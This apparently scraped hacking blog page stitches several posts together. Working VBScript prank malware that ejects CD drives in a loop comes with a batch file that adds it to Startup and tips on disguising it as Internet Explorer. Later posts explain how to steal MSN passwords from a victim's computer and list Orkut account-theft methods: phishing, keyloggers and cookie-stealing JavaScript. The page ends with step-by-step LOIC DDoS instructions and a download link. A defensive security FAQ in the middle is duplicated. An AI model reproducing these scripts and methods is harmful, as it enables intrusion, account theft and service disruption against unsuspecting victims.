Hey guys, wanna have fun-hacking with ur CD drive. Copy the following code to notepad, and then save as CDfun.vbs, remember the extension ".vbs". Now double click on the file you just made, your cd drive will now repeatedly starts moving in and out. The code is as;
set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection
sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
Now this is funny but what if it was even funnier. What if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.
1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs
Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.
This knowledge is donated by Jai prakash, jai1147@gmail.com, thanks to Jai!
Showing posts with label Hacking Secrets. Show all posts
Showing posts with label Hacking Secrets. Show all posts
What are hackers?
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. (There is in fact more to it than that - hackerdom is an entire culture in its own right.) However, most people understand a hacker to be what is more accurately known as a 'cracker'. Worryingly, people tend to prefer to use the word 'hacker' over the more technically correct 'cracker'. This means that many are afraid to use the word for its correct meaning. On this website, when I refer to a hacker, I actually mean a cracker. This is because I prefer to use language that I feel most people understand, rather than language that is technically correct. If you want to know what a cracker is, please read ahead to the next section...
What are crackers?
Crackers are people who try to gain unauthorised access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer. Obviously, a good protection from this is to change passwords regularly. Another good move is the use of software that supports intruder lockout, where no further passwords are accepted after a certain number of bad passwords have tried. Even the correct password wouldn't allow access. Such blocks are normally released after a period of time has elapsed (eg 15 minutes). Of course, an even better idea is never to put security-sensitive resources on the Internet in the first place. If you don't want something to be accessed from the Internet, then make it so that it is only accessible from your local network, or even just from one computer. However, backdoor programs are programs that can expose files to the Internet that were never meant to be shared with other people. You can protect yourself from these by using a firewall and a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an e-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. Note that this can normally only be done if you are using Microsoft Outlook or Outlook Express. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. If you do use Outlook or Outlook Express, and you do not have the correct security patches installed, it may be possible for a malicious program to be executed from an e-mail when you receive it, without the need for you to click on any attachments. Note that the same bug also affects Internet Explorer. A security patch is available for this, but personally I would advise that you use different mail and web browsing software. There are other ways of cracking as well, some more widespread than others. See How do hackers hack? for more information. Note that on most of this website, I refer to 'hackers' instead of 'crackers'. I mean 'crackers'. A cracker is someone too who does reverse eng. on programs and covers LL programming languages (like ASM 4 example) and modifies the program, mostly in aim of removing limitations !
What damage can a hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached! Hackers can do great damage to your computer. They could delete vital files from your hard disk, without which your computer could not work. However, you can re-install these from backups (you do keep backups, don't you?) In theory, the absolute worst damage a hacker could do is turn your computer into a large paperweight. It is possible - the CiH virus demonstrated how. This virus attacked your computer using the then new Flash BIOS technology. This capability was intended to be used to upgrade your computer's BIOS. (The BIOS is a program stored on a chip inside your computer. It controls quite a lot of low-level stuff and is a very vital part of your computer. It is the BIOS that does all the memory checks when you turn on, and also performs the first stage in loading your operating system.) However, the virus used this 'feature' to destroy the BIOS. Without the BIOS, the computer can't work. The only way to recover from this would be to replace your computer's motherboard. At the time of writing this, there are no backdoor programs that can do the same thing, but it is easy enough for a hacker to install a virus that does. Since the CiH virus, many BIOSs have a "flash write protect" option in BIOS setup, and/or a jumper setting on the motherboard that has a similar effect. See your motherboard manual for details.
How does a firewall protect me?
Basically, firewalls protect your computer from unauthorised access attempts. There are two kinds of firewall. Networked computers tend to be connected to the Internet through just one or two computers (hence only one Internet connection is required). These computers behave as firewalls by blocking any unauthorised packets. Any other packets are passed on to the computer they are intended for. This kind of firewall is called a corporate firewall. The kind of firewall you may be more familiar with is a personal firewall- this is a program that runs on your computer, and blocks any unauthorised incoming packets. Personally, I use ZoneAlarm. The great thing about ZoneAlarm is that it is easy to configure. Also, it only allows chosen programs to access the Internet- allowing you to block hackers that use standard protocols such as FTP. In case of emergency, it also has an emergency stop button, which allows you to block allfree by private individuals and charities. Businesses, governments, and educational institutions can download ZoneAlarm on the basis of a 60-day free trial. See ZoneLab's website for more information. access to the Internet immediately. ZoneAlarm can be downloaded and used for Remember that although a firewall stops hackers from getting in, it will not remove any existing 'backdoor' software from your machine. For this, you need a good anti-virus product like Norton or Sophos. Also make sure that you use your anti-virus software regularly, and that you keep it up-to-date.
How do I report hackers?
When an access attempt occurs, if you have alert popups turned on, ZoneAlarm will tell you the IP address of the possible hacker. This looks something like 123.123.123.123 (example only). You can use this information to track down and report hackers to their ISP. Bare in mind that you are unlikely to get any response apart from a simple acknowledgement- they have to deal with hundreds of reports like yours every day. Here is a rough guide of how to report hackers (note: some of the programs referred to are only available in Windows):
Make a note of all the information ZoneAlarm gives you. If possible, use ZoneAlarm's text log option- many ISPs prefer text log format (personally, I supply ZoneAlarm's text log and an English translation).
Select Start, Run... In the Run box, type in "winipcfg" and then click OK. This will tell you what your IP address is (among other things). Write down the IP address.
Use an Internet tool like SamSpade's address digger to look up which ISP uses the IP address given in your firewall's log.
This will return a lot of technical information. Some ISPs add remarks to this information telling you where to send abuse reports to. Make a note of any such e-mail addresses. If there is no such information, look at the official name for the server (near the top), or the names of the domain name servers. To convert these to an e-mail address, remove everything before the first period, including the period itself, then add 'abuse@' in front of it.
Now send an e-mail to the abuse address(es) you have. If the recipient obviously isn't English (eg if the e-mail address ends in .de (Germany) or .fr (France)), write it in their language, if you know it. If not, don't worry, most people speak at least a little English, and the technical language of computers is the same almost anywhere you go!
Include in the message what ZoneAlarm told you. Also include your own IP address (this is what winipcfg told you), the date, the time, your time zone (in relation to GMT), and an indication of how accurate your computer's clock is (eg if you set it by the atomic clock every day, say so!)
What is a port scan?
A port scan is, quite simply, a test to see if a computer exists and responds to access attempts on a certain port (eg TCP port 80, used by the HTTP protocol). Port scans, on their own, are quite harmless and have many legitimate uses. However, they also have a malicious use, which is to test to see if any particular backdoor software is running on a computer for the purposes of then using such backdoor software. In my Internet logs, I include all unauthorised port scans of my computer. I tend to describe these port scans as hack attempts, since it is most likely that this is what they are. To be absolutely pedantic, I shouldn't really describe them as such, since there may be other explanations.
What is an IP address?
An IP address is a number that can uniquely identify any computer on the Internet. With the current Internet protocol (IPv4), an IP address is a 32-bit number. That means that as a binary number, it would be stored as 32 ones and zeroes. There are 4,294,967,296 possible IP addresses. However, we humans tend to split IP addresses into four 8-bit numbers, express these numbers using our decimal number system, and separate them with dots. With 8-bit numbers, each number must be a whole number in the range 0 to 255, inclusive. For example, an IP address of 2,071,690,107 would probably be expressed as 123.123.123.123 (example only). Some people might express an IP address in hexadecimal as well (7B7B7B7Bh in this case). The dotted IP address is by far the most common, however. As the Internet grows, plans are being made to increase the size of IP addresses. (The "next" Internet protocol, IPv6, uses 128-bit IP addresses.) The problem with that, of course, is that quite a few Internet protocols would need to be rewritten, since they are designed to work with 32-bit IP addresses. This includes the Internet Protocol itself (IP). Thankfully, Internet packets include an IP version flag, so it would be possible to have both old and new implementations of the IP communicate with each other. (The newer implementation would use the older protocol when communicating with older implementations. Implementations of the IP would know whether a computer was using the older or newer protocol from the version flag. Unfortunately, older implementations would not be able to access anything outside of the 32-bit IP range.) IP addresses can be statically or dynamically allocated. Statically allocated IP addresses always refer to the same computer. However, dynamically allocated IP addresses can refer to different computers at different times. For example, if you have a dial-up Internet connection, your IP address doesn't become unused when you hang up- it is allocated to someone else. When you reconnect, you are allocated a new IP address. This is dynamic allocation.
How can I hack?
I don't like that first person pronoun... I don't mind explaining how hackers hack, but I won't explain how you can hack. This is not a pro-hacking website. This is a computer security site. My aim is not to encourage or assist hacking in any way. I aim to try to inform people of the risks that they may be exposed to, so that they can better protect themselves from these risks. I also provide this website as a resource for those with an academic interest. If you want a rough idea of some of the cracking methods that other people (not you) use, just read on to the next section.
How do hackers hack?
There are many ways in which a hacker can hack. The most common way is by using a backdoor program. See What damage can a hacker do? for more information on these. However, there are some 'special' cases. Click a link below for more information. NetBIOS - UDP 137, UDP 138, TCP 139
ICMP Ping - Internet Control Message Protocol
FTP - TCP 21
rpc.statd - TCP 111, TCP 9704
lpr - TCP 515
HTTP - TCP 80
How can NetBIOS be harmful?
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely. Not all Windows computers are vulnerable to this kind of attack. If you have a firewall that blocks incoming NetBIOS packets, you are safe. Some network configurations will also be immune. To find out whether you are vulnerable, visit GRC's ShieldsUP!, and click the "Test My Shields!" image half way down the page. Note that GRC will attempt to connect to your computer using NetBIOS - this is just to test whether your computer is vulnerable. GRC will not retain any information about your computer, nor will any damage be done. NetBIOS uses TCP port 139, UDP port 137 and UDP port 138.
How can ICMP Ping be harmful?
ICMP is one of the main protocols that makes the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer. People who do have firewalls normally don't bother to report pings, because they are innocent in themselves - allowing the hacker to continue hacking for quite a long period of time.
How can FTP be harmful?
FTP is a standard Internet protocol, standing for File Transfer Protocol. You might use it for file downloads from some websites. If you have a web page of your own, you might use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files. Hackers can get round this by using programs called "backdoor programs". You wouldn't know if you had one of these, unless you used an up-to-date virus scanner regularly. You could get a backdoor program by opening an infected E-mail attachment. FTP backdoor programs, such as Doly Trojan, Fore, and Blade Runner, simply turn your computer into an FTP server, without any authentication. Using a known protocol such as FTP is easier for hackers because the protocol is already defined - not so much new software needs to be written to use it (a normal FTP client could be used - the hacker wouldn't need any specialist software). Also, since FTP has legitimate uses, many firewalls do not block it. Luckily, ZoneAlarm does.
How can rpc.statd be harmful?
This is a problem specific to Linux and Unix. I am not too sure with what precisely rpc.statd should be used for. I do, however, know that it is used by hackers. rpc.statd is typically used as a 'file locking status monitor' (whatever that is) on local area networks. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds. That is the problem. rpc.statd uses TCP ports 111 and 9704.
How can lpr be harmful?
This is a similar problem specific to Linux and Unix. lpr is typically used as a printing system. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem (again). See rpc.statd for more information on this problem. Basically, the result of this problem is that data can be written into parts of memory it shouldn't be written to. A skilled hacker could write program code into memory to perform his evil deeds. lpr uses TCP port 515.
How can HTTP be harmful?
HTTP stands for HyperText Transfer Protocol. It is one of the main protocols used on the Internet- it is what you are using right now to view this web page. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, parts of the request get written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. The Code Red worm takes advantage of this. This worm even managed to infect the Microsoft Windows Update site at one point. Despite what I have just said, it is still possible for home users to become infected with such worms, since some people install Personal Web Server without knowing what it is. Some computers even have PWS pre-installed when you buy them. To see if PWS is running on your computer, hover your mouse over each of the icons in the bottom right corner of your screen, until a small description appears. If one of the icons is PWS, right-click it and choose to exit. Then, use Add/Remove Programs in Control Panel to remove the program from your system. Microsoft Personal Web Server is used to serve web pages directly from your computer to the rest of the world. Of course, you would need to be connected to the Internet 24 hours a day in order to do this. Most people will tend to upload Internet material to their ISP, rather than provide access to it directly from their own computer. And just to clear up any remaining confusion: Microsoft Personal Web Server is not required to surf the Internet- all you need to surf the Internet is a web browser and an Internet connection (such as dial-up).
HTTP uses TCP port 80. I am not sure if Microsoft has released a patch to correct the problems I describe.
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. (There is in fact more to it than that - hackerdom is an entire culture in its own right.) However, most people understand a hacker to be what is more accurately known as a 'cracker'. Worryingly, people tend to prefer to use the word 'hacker' over the more technically correct 'cracker'. This means that many are afraid to use the word for its correct meaning. On this website, when I refer to a hacker, I actually mean a cracker. This is because I prefer to use language that I feel most people understand, rather than language that is technically correct. If you want to know what a cracker is, please read ahead to the next section...
What are crackers?
Crackers are people who try to gain unauthorised access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer. Obviously, a good protection from this is to change passwords regularly. Another good move is the use of software that supports intruder lockout, where no further passwords are accepted after a certain number of bad passwords have tried. Even the correct password wouldn't allow access. Such blocks are normally released after a period of time has elapsed (eg 15 minutes). Of course, an even better idea is never to put security-sensitive resources on the Internet in the first place. If you don't want something to be accessed from the Internet, then make it so that it is only accessible from your local network, or even just from one computer. However, backdoor programs are programs that can expose files to the Internet that were never meant to be shared with other people. You can protect yourself from these by using a firewall and a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an e-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. Note that this can normally only be done if you are using Microsoft Outlook or Outlook Express. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. If you do use Outlook or Outlook Express, and you do not have the correct security patches installed, it may be possible for a malicious program to be executed from an e-mail when you receive it, without the need for you to click on any attachments. Note that the same bug also affects Internet Explorer. A security patch is available for this, but personally I would advise that you use different mail and web browsing software. There are other ways of cracking as well, some more widespread than others. See How do hackers hack? for more information. Note that on most of this website, I refer to 'hackers' instead of 'crackers'. I mean 'crackers'. A cracker is someone too who does reverse eng. on programs and covers LL programming languages (like ASM 4 example) and modifies the program, mostly in aim of removing limitations !
What damage can a hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached! Hackers can do great damage to your computer. They could delete vital files from your hard disk, without which your computer could not work. However, you can re-install these from backups (you do keep backups, don't you?) In theory, the absolute worst damage a hacker could do is turn your computer into a large paperweight. It is possible - the CiH virus demonstrated how. This virus attacked your computer using the then new Flash BIOS technology. This capability was intended to be used to upgrade your computer's BIOS. (The BIOS is a program stored on a chip inside your computer. It controls quite a lot of low-level stuff and is a very vital part of your computer. It is the BIOS that does all the memory checks when you turn on, and also performs the first stage in loading your operating system.) However, the virus used this 'feature' to destroy the BIOS. Without the BIOS, the computer can't work. The only way to recover from this would be to replace your computer's motherboard. At the time of writing this, there are no backdoor programs that can do the same thing, but it is easy enough for a hacker to install a virus that does. Since the CiH virus, many BIOSs have a "flash write protect" option in BIOS setup, and/or a jumper setting on the motherboard that has a similar effect. See your motherboard manual for details.
How does a firewall protect me?
Basically, firewalls protect your computer from unauthorised access attempts. There are two kinds of firewall. Networked computers tend to be connected to the Internet through just one or two computers (hence only one Internet connection is required). These computers behave as firewalls by blocking any unauthorised packets. Any other packets are passed on to the computer they are intended for. This kind of firewall is called a corporate firewall. The kind of firewall you may be more familiar with is a personal firewall- this is a program that runs on your computer, and blocks any unauthorised incoming packets. Personally, I use ZoneAlarm. The great thing about ZoneAlarm is that it is easy to configure. Also, it only allows chosen programs to access the Internet- allowing you to block hackers that use standard protocols such as FTP. In case of emergency, it also has an emergency stop button, which allows you to block allfree by private individuals and charities. Businesses, governments, and educational institutions can download ZoneAlarm on the basis of a 60-day free trial. See ZoneLab's website for more information. access to the Internet immediately. ZoneAlarm can be downloaded and used for Remember that although a firewall stops hackers from getting in, it will not remove any existing 'backdoor' software from your machine. For this, you need a good anti-virus product like Norton or Sophos. Also make sure that you use your anti-virus software regularly, and that you keep it up-to-date.
How do I report hackers?
When an access attempt occurs, if you have alert popups turned on, ZoneAlarm will tell you the IP address of the possible hacker. This looks something like 123.123.123.123 (example only). You can use this information to track down and report hackers to their ISP. Bare in mind that you are unlikely to get any response apart from a simple acknowledgement- they have to deal with hundreds of reports like yours every day. Here is a rough guide of how to report hackers (note: some of the programs referred to are only available in Windows):
Make a note of all the information ZoneAlarm gives you. If possible, use ZoneAlarm's text log option- many ISPs prefer text log format (personally, I supply ZoneAlarm's text log and an English translation).
Select Start, Run... In the Run box, type in "winipcfg" and then click OK. This will tell you what your IP address is (among other things). Write down the IP address.
Use an Internet tool like SamSpade's address digger to look up which ISP uses the IP address given in your firewall's log.
This will return a lot of technical information. Some ISPs add remarks to this information telling you where to send abuse reports to. Make a note of any such e-mail addresses. If there is no such information, look at the official name for the server (near the top), or the names of the domain name servers. To convert these to an e-mail address, remove everything before the first period, including the period itself, then add 'abuse@' in front of it.
Now send an e-mail to the abuse address(es) you have. If the recipient obviously isn't English (eg if the e-mail address ends in .de (Germany) or .fr (France)), write it in their language, if you know it. If not, don't worry, most people speak at least a little English, and the technical language of computers is the same almost anywhere you go!
Include in the message what ZoneAlarm told you. Also include your own IP address (this is what winipcfg told you), the date, the time, your time zone (in relation to GMT), and an indication of how accurate your computer's clock is (eg if you set it by the atomic clock every day, say so!)
What is a port scan?
A port scan is, quite simply, a test to see if a computer exists and responds to access attempts on a certain port (eg TCP port 80, used by the HTTP protocol). Port scans, on their own, are quite harmless and have many legitimate uses. However, they also have a malicious use, which is to test to see if any particular backdoor software is running on a computer for the purposes of then using such backdoor software. In my Internet logs, I include all unauthorised port scans of my computer. I tend to describe these port scans as hack attempts, since it is most likely that this is what they are. To be absolutely pedantic, I shouldn't really describe them as such, since there may be other explanations.
What is an IP address?
An IP address is a number that can uniquely identify any computer on the Internet. With the current Internet protocol (IPv4), an IP address is a 32-bit number. That means that as a binary number, it would be stored as 32 ones and zeroes. There are 4,294,967,296 possible IP addresses. However, we humans tend to split IP addresses into four 8-bit numbers, express these numbers using our decimal number system, and separate them with dots. With 8-bit numbers, each number must be a whole number in the range 0 to 255, inclusive. For example, an IP address of 2,071,690,107 would probably be expressed as 123.123.123.123 (example only). Some people might express an IP address in hexadecimal as well (7B7B7B7Bh in this case). The dotted IP address is by far the most common, however. As the Internet grows, plans are being made to increase the size of IP addresses. (The "next" Internet protocol, IPv6, uses 128-bit IP addresses.) The problem with that, of course, is that quite a few Internet protocols would need to be rewritten, since they are designed to work with 32-bit IP addresses. This includes the Internet Protocol itself (IP). Thankfully, Internet packets include an IP version flag, so it would be possible to have both old and new implementations of the IP communicate with each other. (The newer implementation would use the older protocol when communicating with older implementations. Implementations of the IP would know whether a computer was using the older or newer protocol from the version flag. Unfortunately, older implementations would not be able to access anything outside of the 32-bit IP range.) IP addresses can be statically or dynamically allocated. Statically allocated IP addresses always refer to the same computer. However, dynamically allocated IP addresses can refer to different computers at different times. For example, if you have a dial-up Internet connection, your IP address doesn't become unused when you hang up- it is allocated to someone else. When you reconnect, you are allocated a new IP address. This is dynamic allocation.
How can I hack?
I don't like that first person pronoun... I don't mind explaining how hackers hack, but I won't explain how you can hack. This is not a pro-hacking website. This is a computer security site. My aim is not to encourage or assist hacking in any way. I aim to try to inform people of the risks that they may be exposed to, so that they can better protect themselves from these risks. I also provide this website as a resource for those with an academic interest. If you want a rough idea of some of the cracking methods that other people (not you) use, just read on to the next section.
How do hackers hack?
There are many ways in which a hacker can hack. The most common way is by using a backdoor program. See What damage can a hacker do? for more information on these. However, there are some 'special' cases. Click a link below for more information. NetBIOS - UDP 137, UDP 138, TCP 139
ICMP Ping - Internet Control Message Protocol
FTP - TCP 21
rpc.statd - TCP 111, TCP 9704
lpr - TCP 515
HTTP - TCP 80
How can NetBIOS be harmful?
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely. Not all Windows computers are vulnerable to this kind of attack. If you have a firewall that blocks incoming NetBIOS packets, you are safe. Some network configurations will also be immune. To find out whether you are vulnerable, visit GRC's ShieldsUP!, and click the "Test My Shields!" image half way down the page. Note that GRC will attempt to connect to your computer using NetBIOS - this is just to test whether your computer is vulnerable. GRC will not retain any information about your computer, nor will any damage be done. NetBIOS uses TCP port 139, UDP port 137 and UDP port 138.
How can ICMP Ping be harmful?
ICMP is one of the main protocols that makes the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer. People who do have firewalls normally don't bother to report pings, because they are innocent in themselves - allowing the hacker to continue hacking for quite a long period of time.
How can FTP be harmful?
FTP is a standard Internet protocol, standing for File Transfer Protocol. You might use it for file downloads from some websites. If you have a web page of your own, you might use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files. Hackers can get round this by using programs called "backdoor programs". You wouldn't know if you had one of these, unless you used an up-to-date virus scanner regularly. You could get a backdoor program by opening an infected E-mail attachment. FTP backdoor programs, such as Doly Trojan, Fore, and Blade Runner, simply turn your computer into an FTP server, without any authentication. Using a known protocol such as FTP is easier for hackers because the protocol is already defined - not so much new software needs to be written to use it (a normal FTP client could be used - the hacker wouldn't need any specialist software). Also, since FTP has legitimate uses, many firewalls do not block it. Luckily, ZoneAlarm does.
How can rpc.statd be harmful?
This is a problem specific to Linux and Unix. I am not too sure with what precisely rpc.statd should be used for. I do, however, know that it is used by hackers. rpc.statd is typically used as a 'file locking status monitor' (whatever that is) on local area networks. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds. That is the problem. rpc.statd uses TCP ports 111 and 9704.
How can lpr be harmful?
This is a similar problem specific to Linux and Unix. lpr is typically used as a printing system. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem (again). See rpc.statd for more information on this problem. Basically, the result of this problem is that data can be written into parts of memory it shouldn't be written to. A skilled hacker could write program code into memory to perform his evil deeds. lpr uses TCP port 515.
How can HTTP be harmful?
HTTP stands for HyperText Transfer Protocol. It is one of the main protocols used on the Internet- it is what you are using right now to view this web page. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, parts of the request get written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. The Code Red worm takes advantage of this. This worm even managed to infect the Microsoft Windows Update site at one point. Despite what I have just said, it is still possible for home users to become infected with such worms, since some people install Personal Web Server without knowing what it is. Some computers even have PWS pre-installed when you buy them. To see if PWS is running on your computer, hover your mouse over each of the icons in the bottom right corner of your screen, until a small description appears. If one of the icons is PWS, right-click it and choose to exit. Then, use Add/Remove Programs in Control Panel to remove the program from your system. Microsoft Personal Web Server is used to serve web pages directly from your computer to the rest of the world. Of course, you would need to be connected to the Internet 24 hours a day in order to do this. Most people will tend to upload Internet material to their ISP, rather than provide access to it directly from their own computer. And just to clear up any remaining confusion: Microsoft Personal Web Server is not required to surf the Internet- all you need to surf the Internet is a web browser and an Internet connection (such as dial-up).
HTTP uses TCP port 80. I am not sure if Microsoft has released a patch to correct the problems I describe.
MSN Password Hacker scans your computer for stored MSN account passwords and thus you can hack your msn account password. But, remember, for this msn hacking software to work, there must be locally stored msn passwords on victim computer.
Steps to Use MSN Password Hacker:
1. Download MSN password hacker software.
2. Now, extract the zip file and run WLMPasswords.exe. No installation is required for this.
3. In the text field next to "Filter", type in the Windows live messenger email address to be hacked and hit Check.
4. After this, MSN password hacker will scan computer for msn password.
5. And then, you will get MSN account password in plain "text format". Thus, windows live messenger account hacked !!!
Now, how do you hack friend's msn windows live messenger account password. Simply, run the msn hacking program on victim computer with his windows live messenger email id in Filter and hit check. Thus, MSN Password hacker will give you msn windows live messenger password and you will be able to hack his windows live messenger account...cheers.
Note: For this msn hacking software- MSN password hacker to work, you should have .NET Framework version 2.0 and windows live messenger installed.
I hope you are now able to hack friend's msn windows live messenger account password using this msn hacking software- MSN Password Hacker. If you have any query or comment about MSN Password hacker, please mention in comments section.
Enjoy HaCkInG.....
Orkut has became major social network in India and even abroad. So, naturally, www.orkut.com is becoming a target of hackers. There are many hacking tricks or hacks to hack orkut account passwords. So, i have listed most popular Orkut account password hacking tricks. Below, i have mentioned all Orkut account password hacking methods.
1. Orkut Phishing:
As i have stated in all articles, Phishing is first priority to hack Orkut account passwords. Infact, it is most favorite method of orkut hackers. Here, you have to send a fake orkut login page (orkut phisher) to orkut friend and ask him to login to orkut account by this fake orkut login phisher. This orkut phisher is, ofcourse, prepared by you. When orkut friend logs in to orkut account by this orkut phisher, his orkut password is emailed to you and thus you can now hack his orkut account. I have added on how to make phisher in my article Hack email/orkut account by Phishing.
2. Keylogging :
This is most easy method ever found. Here, you have to install keylogger software on victim computer and give destination at which keylogger will send all passwords typed on friend's computer. And then keylogger will start recording all keystrokes on victim computer and send these passwords. This keylogging becomes more easy if you have physical access to victim computer. Even, remote keylogger installation can be done. You can use Ardamax keylogger to hack orkut account password.
3. Community links :
Many times, you are provided with community links in orkut scraps inviting you to join it. On clicking the link in orkut scrap, you are directed to orkut phisher explained above, ready to hack your orkut profile account.
4. Orkut Javascript hack :
This method became much famous in last year. Here, orkut victim is provided with some javascript (popularly called code) and is asked to copy paste this javascript code in his address bar for say changing his orkut theme. When victim does this, his orkut cookies are stolen and now orkut hacker can hack his orkut account using orkut cookies. I have written more on orkut cookie stealing in Hack Orkut account by Cookie stealing.
5. Orkut New Features :
I received an orkut scrap that looks like they are giving the user a choice of using new features for orkut with your ID and password, of course!! When user submits the orkut page, his ID and password is mailed to orkut hacker and thus his orkut account is hacked.
6. Primary email address hack :
If orkut hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this orkut hacker can easily hack your orkut account using "Forgot password" trick. He will simply ask orkut to send password reset email to your primary email address- which is already hacked. Thus, your orkut account password will be reset and orkut account hacked !!!
So, always remember to protect your orkut primary email address and try to keep unknown or useless mail id as your primary email address.
So friends, i hope you all are now knowing methods to hack orkut account passwords. I have tried to keep this orkut hacking article simple. If you have any comments or new methods on how to hack orkut account password, please mention it in comments section.
Enjoy HaCkInG.....
In this tutorial, I will show you how to take down websites via DDoS. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.
Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!
DOWNLOAD HERE: http://rapidshare.com/files/104926676/LOIC.exe
I would like to inform you that i have not yet tried this hack, so i cant tell you much about it...sorry for that. But, you can help me out by commenting your experience or even by mailing me.
Enjoy HaCkInG.....
Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
